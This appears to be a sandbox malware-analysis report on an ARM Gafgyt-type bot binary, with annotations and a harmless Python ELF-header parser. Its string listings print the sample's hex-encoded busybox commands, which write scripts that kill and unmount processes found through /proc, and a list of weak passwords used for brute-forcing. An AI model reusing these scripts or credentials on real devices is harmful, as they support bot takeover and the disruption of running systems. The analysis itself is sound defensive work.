
Linux Analysis Report
arm6.elf

Overview

General Information

Sample name: arm6.elf
Analysis ID: 1654250
MD5: 64888b10ebb99e76fbe6e824775275f9
SHA1: 5455ce92af7774d0a22618eba4d4bb01fc1ee713
SHA256: 260f2b3a065c109d606f751b30be701413826d929f71176b39d603ffb37dbed4
Tags: elf, user-abuse_ch

Detection

Score: 48
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1654250
Start date and time: 2025-04-02 07:42:20 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: arm6.elf
Detection: MAL
Classification: mal48.linELF@0/4@2/0
Command: /tmp/arm6.elf
PID: 5432
Exit Code: 0
Exit Code Info: (none)
Killed: False
Standard Output: For God so loved the world
Standard Error: (empty)

Process Tree

  • system is lnxubuntu20
  • arm6.elf (PID: 5432, Parent: 5355, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm6.elf
    • arm6.elf New Fork (PID: 5459, Parent: 5432)
  • dash New Fork (PID: 5436, Parent: 3587)
  • rm (PID: 5436, Parent: 3587, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3S
  • dash New Fork (PID: 5437, Parent: 3587)
  • rm (PID: 5437, Parent: 3587, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3S
  • cleanup
No yara matches
No Suricata rule has matched


AV Detection

Source: arm6.elf | Virustotal: Detection: 42%
Source: arm6.elf | ReversingLabs: Detection: 41%
Source: /tmp/arm6.elf (PID: 5459) | Socket: 127.0.0.1:22448
Source: global traffic | TCP traffic: 192.168.2.13:57218 -> 54.247.62.1:443
Source: unknown | TCP traffic detected without corresponding DNS query: 54.247.62.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (two packets)
Source: global traffic | DNS traffic detected: DNS query: daisy.ubuntu.com
Source: unknown | Network traffic detected: HTTP traffic on port 57218 -> 443
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sample | String containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sample | String containing potential weak password found: 12345
Source: Initial sample | String containing potential weak password found: 54321
Source: Initial sample | String containing potential weak password found: 654321
Source: Initial sample | String containing potential weak password found: admin1234
Source: Initial sample | String containing potential weak password found: administrator
Source: Initial sample | String containing potential weak password found: supervisor
Source: Initial sample | String containing potential weak password found: password
Source: Initial sample | String containing potential weak password found: default
Source: Initial sample | String containing potential weak password found: guest
Source: Initial sample | String containing potential weak password found: service
Source: Initial sample | String containing potential weak password found: support
Source: ELF static info symbol of initial sample | .symtab present: no
Source: /tmp/arm6.elf (PID: 5432) | SIGKILL sent: pid: 3688, result: successful
Source: classification engine | Classification label: mal48.linELF@0/4@2/0
Source: /tmp/arm6.elf (PID: 5432) | File opened: /proc/<pid>/cmdline, 93 opens covering 81 PIDs: 1-29, 110-129, 230-249, 800, 802, 803, 914, 917, 1588, 1906, 3095, 3420, 3643, 5274 and 5379 (the 12 PIDs on the next line had cmdline opened twice, once before and once after their fd directory)
Source: /tmp/arm6.elf (PID: 5432) | File opened: /proc/<pid>/fd for PIDs 1, 800, 802, 803, 914, 917, 1588, 1906, 3095, 3420, 3643 and 5274
Source: /tmp/arm6.elf (PID: 5432) | File opened: /proc/1/maps
Source: /usr/bin/dash (PID: 5436) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3S
Source: /usr/bin/dash (PID: 5437) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3S
(Both dash/rm pairs have parent PID 3587, not the sample's PID 5432, and delete mktemp-style files in /tmp; see the process tree. The "rm" signature therefore does not describe an action of arm6.elf.)
Source: /tmp/arm6.elf (PID: 5432) | Queries kernel information via 'uname'
Source: arm6.elf, 5459.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmp | Binary or memory string: lUqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm6.elf, 5432.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmp | Binary or memory string: lU/tmp/qemu-open.VspajY:5v
Source: arm6.elf, 5459.1.00007f1674039000.00007f1674040000.rw-.sdmp | Binary or memory string: vmware
Source: arm6.elf, 5432.1.0000556cd2fa7000.0000556cd30f6000.rw-.sdmp, arm6.elf, 5459.1.0000556cd2fa7000.0000556cd30f6000.rw-.sdmp | Binary or memory string: lU!/etc/qemu-binfmt/arm
Source: arm6.elf, 5432.1.00007f1674039000.00007f1674040000.rw-.sdmp, arm6.elf, 5459.1.00007f1674039000.00007f1674040000.rw-.sdmp | Binary or memory string: qemu-arm
Source: arm6.elf, 5432.1.0000556cd2fa7000.0000556cd30f6000.rw-.sdmp, arm6.elf, 5459.1.0000556cd2fa7000.0000556cd30f6000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/arm
Source: arm6.elf, 5432.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmp, arm6.elf, 5459.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-arm
Source: arm6.elf, 5432.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmp | Binary or memory string: /tmp/qemu-open.VspajY
Source: arm6.elf, 5432.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmp, arm6.elf, 5459.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm6.elf
Source: arm6.elf, 5459.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmp | Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm6.elf, 5432.1.00007f1674039000.00007f1674040000.rw-.sdmp, arm6.elf, 5459.1.00007f1674039000.00007f1674040000.rw-.sdmp | Binary or memory string: !!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
(The qemu-arm, /etc/qemu-binfmt/arm and /usr/bin/qemu-arm strings, together with the "uncaught target signal 11" message, show that the ARM binary ran under the QEMU user-mode emulator on the x86-64 analysis VM and that the forked child, PID 5459, died with SIGSEGV. The dumped regions belong to the emulator process and contain the host environment (the SUDO_USER/PATH string), so the "vmware" string cannot be attributed to the sample's own code from this report alone, and any behaviour the child would have shown after the crash was not observed.)
MITRE ATT&CK mapping (number of matching signatures per technique; the remaining cells of the matrix carried no matches)

  • Defense Evasion: File Deletion (1)
  • Credential Access: OS Credential Dumping (1), Brute Force (1)
  • Discovery: Security Software Discovery (11)
  • Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (1), Application Layer Protocol (2)
No configs have been found

Behavior Graph (ID 1654250, sample arm6.elf, start date 02/04/2025, architecture LINUX, score 48)

  • 54.247.62.1, port 443, AMAZON-02US, United States
  • daisy.ubuntu.com
  • Signature: Multi AV Scanner detection for submitted file
  • Process: arm6.elf (started), which started a second arm6.elf
  • Process: dash, which started rm (two dash/rm pairs)
Source | Detection | Scanner | Label
arm6.elf | 42% | Virustotal |
arm6.elf | 42% | ReversingLabs | Linux.Backdoor.Gafgyt
No Antivirus matches for dropped files, domains or URLs.


Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
daisy.ubuntu.com | 162.213.35.25 | true | false | | high

IPs
IP | Domain | Country | ASN | ASN Name | Malicious
54.247.62.1 | unknown | United States | 16509 | AMAZON-02US | false
Context for 54.247.62.1 (other analyses in which this IP appeared)
Associated Sample Name / URL | Detection | Threat Name
na.elf | malicious | Prometei
jfeeps.elf | malicious | Unknown
arm.elf | malicious | Unknown
na.elf | malicious | Prometei
parm6.elf | malicious | Mirai
rjfe686.elf | malicious | Unknown
na.elf | malicious | Prometei
sh4.elf | malicious | Mirai
na.elf | malicious | Prometei
na.elf | malicious | Prometei

Context for daisy.ubuntu.com
Associated Sample Name / URL | Detection | Threat Name | Resolved IP
rjfe686.elf | malicious | Unknown | 162.213.35.25
arm.elf | malicious | Mirai | 162.213.35.25
efefa7.elf | malicious | Mirai | 162.213.35.24
arm7.elf | malicious | Mirai | 162.213.35.24
weje64.elf | malicious | Unknown | 162.213.35.25
na.elf | malicious | Prometei | 162.213.35.24
drea4.elf | malicious | Unknown | 162.213.35.24
bejv86.elf | malicious | Unknown | 162.213.35.25
efea6.elf | malicious | Unknown | 162.213.35.25
FederalAgent.arm5.elf | malicious | Unknown | 162.213.35.25

Context for AMAZON-02US (ASN 16509)
Associated Sample Name / URL | Detection | Threat Name | IP
full folder details request quotation.exe | malicious | FormBook | 13.248.169.48
na.elf | malicious | Prometei | 54.247.62.1
Payment Remittance.pdf | malicious | Unknown | 3.168.73.96
OC-8563 PURCHASE ORDER.exe | malicious | FormBook | 13.248.169.48
SHIPPING DOCUMENT.exe | malicious | FormBook | 13.248.169.48
vejfa5.elf | malicious | Unknown | 34.243.160.129
efefa7.elf | malicious | Mirai | 34.249.145.219
jfeeps.elf | malicious | Unknown | 54.247.62.1
Payment Copy.exe | malicious | FormBook | 13.248.169.48
vjwe68k.elf | malicious | Unknown | 34.254.182.186

(The same IP, domain and ASN recur across unrelated Linux and Windows analyses, from Mirai and Prometei samples to FormBook documents, which is what sandbox background traffic looks like; none of these rows links 54.247.62.1 or daisy.ubuntu.com to this sample's infrastructure.)

No context (the two remaining context tables are empty)
Dropped files (4)

Entries 1, 3 and 4 (three identical files):
Process: /tmp/arm6.elf
File Type: data
Category: dropped
Size (bytes): 14
Entropy (8bit): 3.521640636343319
Encrypted: false
SSDEEP: 3:Tgj03:Tgw3
MD5: 3F57B2990E079DDED19A289B2C2D9845
SHA1: EC529CD92FCD1419E74F69269A1FBDFB901F3360
SHA-256: 42BAD665C8A094C4820D587524D2B0F1E1AA45E1BA9BCE12E59A92CBA93B90BC
SHA-512: B2E54540954546CA0BDC2B73923B545659131AB088282E7070B2A7C9FBA1D1C1D58CFE4094D1DAE38D578E2B4FD7CB2E3A7D25A06EE84546207EE6A3B19553A8
Malicious: false
Reputation: moderate, very likely benign file
Preview: /tmp/arm6.elf. (13 characters plus a trailing newline)

Entry 2:
Process: /tmp/arm6.elf
File Type: ASCII text
Category: dropped
Size (bytes): 355
Entropy (8bit): 3.8422285464965658
Encrypted: false
SSDEEP: 6:M6gceFXNSD/VUk/FYceFXN6UPj/V/3VVyAb/rVmsVot/VOArB/VH:39eiSMFePFVIAbyl
MD5: E180F404AD20779607CE6A6E5ECD4353
SHA1: 107BA7355A598874556B95B42B748D08FA7FA52D
SHA-256: AB355E0DD96CEEB4CB21B2B86C99481216C508E2499F283558677C2DD2FAE80A
SHA-512: CABB3D8913AAC5E734D9D98DA561D44C5089D40754D3F786F8F8FF130237958C1FCD5812BFCA3F0BAE905E6421B9ACAD311BB9AD17D74D0CE01B6ABA6749F967
Malicious: false
Reputation: low
Preview (a /proc/<pid>/maps listing; line breaks restored where the report shows '.'):
8000-22000 r-xp 00000000 fd:00 531567 /tmp/arm6.elf
29000-2a000 rw-p 00019000 fd:00 531567 /tmp/arm6.elf
2a000-31000 rw-p 00000000 00:00 0
ff7ee000-ff7ef000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so
ff7ef000-ff7f0000 ---p 00000000 00:00 0
ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]
The ARM load address 0x8000 (matching the first LOAD segment below) sitting next to a host x86_64 libm mapping is the emulated sample's own address space as seen through QEMU.
File type: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, stripped
Entropy (8bit): 6.207888986702945
TrID:
  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: arm6.elf
File size: 104'536 bytes
MD5: 64888b10ebb99e76fbe6e824775275f9
SHA1: 5455ce92af7774d0a22618eba4d4bb01fc1ee713
SHA256: 260f2b3a065c109d606f751b30be701413826d929f71176b39d603ffb37dbed4
SHA512: 2ce14ff5b23773457fbc5150832d30659695e5ca879782bef800e1136e6421b7ad6f3a8f9018fc2e2c58b073dee9ebdd89bb1462f54332bf6e7a06854982335d
SSDEEP: 3072:eGAXfdhktRnsY3OcI8SI4dpWAK8YtNulEvGQhMkdN:eGAXfdhktRnsZeS7KtN0Evbhf
TLSH: 2FA3F899B8919B6AC5D406BFFE1F818D33231BF8E2DB3103DD186B24768A51A4E3F541
File Content Preview (non-printable bytes shown as '.'): .ELF..............(.....l...4...P.......4. ...(.........T...T...T.......................................................................\H...........................................@-..@............/..@-.,@...0....S..... 0....S.........../..0...0...@..../

ELF header

Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
Machine: ARM
Version Number: 0x1
Type: EXEC (Executable file)
OS/ABI: UNIX - System V
ABI Version: 0
Entry Point Address: 0x816c
Flags: 0x4000002
ELF Header Size: 52
Program Header Offset: 52
Program Header Size: 32
Number of Program Headers: 4
Section Header Offset: 104016
Section Header Size: 40
Number of Section Headers: 13
Header String Table Index: 12
Section headers
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
(null) | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
.init | PROGBITS | 0x80b4 | 0xb4 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 1
.text | PROGBITS | 0x80c8 | 0xc8 | 0x16af0 | 0x0 | 0x6 | AX | 0 | 0 | 4
.fini | PROGBITS | 0x1ebb8 | 0x16bb8 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 1
.rodata | PROGBITS | 0x1ebcc | 0x16bcc | 0x2888 | 0x0 | 0x2 | A | 0 | 0 | 4
.ARM.exidx | ARM_EXIDX | 0x21454 | 0x19454 | 0xc8 | 0x0 | 0x82 | AL | 2 | 0 | 4
.eh_frame | PROGBITS | 0x2951c | 0x1951c | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4
.init_array | INIT_ARRAY | 0x29520 | 0x19520 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4
.fini_array | FINI_ARRAY | 0x29524 | 0x19524 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4
.got | PROGBITS | 0x2952c | 0x1952c | 0x28 | 0x4 | 0x3 | WA | 0 | 0 | 4
.data | PROGBITS | 0x29554 | 0x19554 | 0x98 | 0x0 | 0x3 | WA | 0 | 0 | 4
.bss | NOBITS | 0x295f0 | 0x195ec | 0x4788 | 0x0 | 0x3 | WA | 0 | 0 | 8
.shstrtab | STRTAB | 0x0 | 0x195ec | 0x62 | 0x0 | 0x0 | | 0 | 0 | 1

Program headers
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
DYNAMIC | 0x19454 | 0x21454 | 0x21454 | 0xc8 | 0xc8 | 4.3109 | 0x4 | R | 0x4 | | .ARM.exidx
LOAD | 0x0 | 0x8000 | 0x8000 | 0x1951c | 0x1951c | 6.2190 | 0x5 | R E | 0x8000 | | .init .text .fini .rodata .ARM.exidx
LOAD | 0x1951c | 0x2951c | 0x2951c | 0xd0 | 0x485c | 3.5932 | 0x6 | RW | 0x8000 | | .eh_frame .init_array .fini_array .got .data .bss
DYNAMIC | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 | |

Note on the two entries labelled DYNAMIC: the section table has no .dynamic, .dynsym, .dynstr or .interp section and no program header names an interpreter, so the binary carries no dynamic-loader dependency and is effectively statically linked despite the "dynamically linked" wording of the file-type string. The first entry (read-only, 0xc8 bytes, covering exactly .ARM.exidx) has the shape of the ARM-specific PT_ARM_EXIDX unwind-table header, and the last (zero size, RWE, align 4) has the shape of a PT_GNU_STACK header requesting an executable stack; both are worth confirming with readelf -l on the file. The section-header table ends at 104016 + 13 × 40 = 104536 bytes, which is exactly the reported file size.
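To check what the program-header table actually says instead of trusting the "dynamically linked" label, the parser below reads an ELF32 little-endian file header and its program headers with nothing but the struct module and answers the loader-relevant questions: is an interpreter or PT_DYNAMIC present, does PT_GNU_STACK ask for an executable stack, does the entry point fall inside an executable LOAD segment, and how large must the file be for the section-header table to fit. It is an added example, not part of the Joe Sandbox report or the sample. Because the sample bytes are not reproduced on this page, it runs against a header image constructed from the values in the tables above; the p_type of the two entries the report labels DYNAMIC is assumed to be PT_ARM_EXIDX and PT_GNU_STACK, an assumption marked in the code.

```python
import struct

# ELF32 constants from the System V ABI, the Linux extensions and the ARM ELF supplement
PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3
PT_GNU_STACK = 0x6474E551
PT_ARM_EXIDX = 0x70000001
PF_X, PF_W, PF_R = 1, 2, 4
EM_ARM = 40
PT_NAMES = {PT_LOAD: "LOAD", PT_DYNAMIC: "DYNAMIC", PT_INTERP: "INTERP",
            PT_GNU_STACK: "GNU_STACK", PT_ARM_EXIDX: "ARM_EXIDX"}

EHDR_FIELDS = ("type", "machine", "version", "entry", "phoff", "shoff", "flags",
               "ehsize", "phentsize", "phnum", "shentsize", "shnum", "shstrndx")
PHDR_FIELDS = ("type", "offset", "vaddr", "paddr", "filesz", "memsz", "flags", "align")


def parse_elf32_le(data):
    """Parse the file header and program headers of an ELF32 little-endian image."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("expected an ELF32 little-endian image")
    ehdr = dict(zip(EHDR_FIELDS, struct.unpack_from("<HHIIIIIHHHHHH", data, 16)))
    if ehdr["phentsize"] != 32:
        raise ValueError("unexpected e_phentsize %d" % ehdr["phentsize"])
    phdrs = []
    for i in range(ehdr["phnum"]):
        raw = struct.unpack_from("<IIIIIIII", data, ehdr["phoff"] + i * 32)
        phdrs.append(dict(zip(PHDR_FIELDS, raw)))
    return ehdr, phdrs


def flags_str(flags):
    """Render p_flags the way readelf does (R, W, E)."""
    return "".join(c if flags & bit else " "
                   for c, bit in (("R", PF_R), ("W", PF_W), ("E", PF_X))).rstrip()


def summarize(ehdr, phdrs):
    """Answer the loader-relevant questions that a file-type string does not."""
    types = [p["type"] for p in phdrs]
    stack = next((p for p in phdrs if p["type"] == PT_GNU_STACK), None)
    exec_loads = [p for p in phdrs if p["type"] == PT_LOAD and p["flags"] & PF_X]
    return {
        # a loader is needed only if there is an interpreter or a dynamic-section segment
        "linkage": "dynamic" if PT_INTERP in types or PT_DYNAMIC in types else "static",
        # None: no PT_GNU_STACK at all, so the kernel's per-architecture default applies
        "exec_stack": None if stack is None else bool(stack["flags"] & PF_X),
        "entry_in_exec_load": any(p["vaddr"] <= ehdr["entry"] < p["vaddr"] + p["memsz"]
                                  for p in exec_loads),
        # the section-header table is the last thing in a linker-produced file
        "min_file_size": ehdr["shoff"] + ehdr["shnum"] * ehdr["shentsize"],
        "segments": [(PT_NAMES.get(p["type"], hex(p["type"])), flags_str(p["flags"]))
                     for p in phdrs],
    }


def build_sample():
    """Constructed 180-byte header image carrying the values from this report's ELF header
    and program-header tables. The real file is not reproduced; the p_type of the two
    entries the report labels DYNAMIC is an assumption (ARM_EXIDX and GNU_STACK)."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # ELF32, LSB, version 1, SYSV
    ehdr = e_ident + struct.pack("<HHIIIIIHHHHHH",
                                 2, EM_ARM, 1, 0x816C, 52, 104016, 0x4000002,
                                 52, 32, 4, 40, 13, 12)
    phdrs = [
        (PT_ARM_EXIDX, 0x19454, 0x21454, 0x21454, 0xC8, 0xC8, PF_R, 0x4),
        (PT_LOAD, 0x0, 0x8000, 0x8000, 0x1951C, 0x1951C, PF_R | PF_X, 0x8000),
        (PT_LOAD, 0x1951C, 0x2951C, 0x2951C, 0xD0, 0x485C, PF_R | PF_W, 0x8000),
        (PT_GNU_STACK, 0, 0, 0, 0, 0, PF_R | PF_W | PF_X, 0x4),
    ]
    return ehdr + b"".join(struct.pack("<IIIIIIII", *p) for p in phdrs)


if __name__ == "__main__":
    # for a real file: hdr, segs = parse_elf32_le(open(path, "rb").read())
    hdr, segs = parse_elf32_le(build_sample())
    for key, value in summarize(hdr, segs).items():
        print(f"{key}: {value}")
```

On the constructed image summarize reports "static" (neither PT_INTERP nor PT_DYNAMIC), an executable stack (the GNU_STACK entry carries PF_X), an entry point of 0x816c inside the R E LOAD segment, and a minimum file size of 104,536 bytes, which matches the reported size; the same function run on the real file would confirm or refute the two assumed p_type values.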


  • Total Packets: 3
  • 443 (HTTPS)
  • 53 (DNS)

TCP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 2, 2025 07:43:08.771858931 CEST | 57218 | 443 | 192.168.2.13 | 54.247.62.1

UDP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 2, 2025 07:43:15.759027004 CEST | 44245 | 53 | 192.168.2.13 | 1.1.1.1
Apr 2, 2025 07:43:15.759072065 CEST | 50117 | 53 | 192.168.2.13 | 1.1.1.1
Apr 2, 2025 07:43:15.857350111 CEST | 53 | 50117 | 1.1.1.1 | 192.168.2.13
Apr 2, 2025 07:43:15.857471943 CEST | 53 | 44245 | 1.1.1.1 | 192.168.2.13

DNS Queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 2, 2025 07:43:15.759027004 CEST | 192.168.2.13 | 1.1.1.1 | 0xaf3b | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
Apr 2, 2025 07:43:15.759072065 CEST | 192.168.2.13 | 1.1.1.1 | 0xc5f | Standard query (0) | daisy.ubuntu.com | 28 (AAAA) | IN (0x0001) | false

DNS Answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 2, 2025 07:43:15.857471943 CEST | 1.1.1.1 | 192.168.2.13 | 0xaf3b | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 07:43:15.857471943 CEST | 1.1.1.1 | 192.168.2.13 | 0xaf3b | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false

Note: the only name resolved is daisy.ubuntu.com, the endpoint of Ubuntu's crash-reporting service, and the single TCP connection (to 54.247.62.1:443, seven seconds before the DNS lookups and without a query of its own) is attributed by the behaviour signatures to "global traffic" and "unknown" rather than to PID 5432 or 5459. Nothing in this capture evidences contact with bot infrastructure, which is consistent with the "all servers are down" signature and with the child process crashing under the emulator.

System Behavior

Start time (UTC): 05:43:11
Start date (UTC): 02/04/2025
Path: /tmp/arm6.elf
Arguments: -
File size: 4956856 bytes
MD5 hash: 5ebfcae4fe2471fcc5695c2394773ff1
(The size and hash of this process entry do not match the submitted file, which is 104'536 bytes with MD5 64888b10ebb99e76fbe6e824775275f9; they belong to the x86-64 process image that executed the ARM sample, consistent with the /usr/bin/qemu-arm and /etc/qemu-binfmt/arm strings found in process memory.)

Start time (UTC): 05:43:11
Start date (UTC): 02/04/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 05:43:11
Start date (UTC): 02/04/2025
